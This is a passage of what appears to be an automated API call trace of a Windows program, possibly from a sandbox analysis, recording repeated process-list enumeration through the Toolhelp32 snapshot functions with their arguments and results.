[0105.377] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.378] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.383] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.451] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.453] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.453] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.454] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.455] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.457] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.458] CloseHandle (hObject=0xc4) returned 1 [0105.459] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0105.463] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.476] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.476] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.477] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.478] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.479] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.479] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.480] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.481] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.482] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.482] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.483] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.485] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.486] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.487] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.488] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.544] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 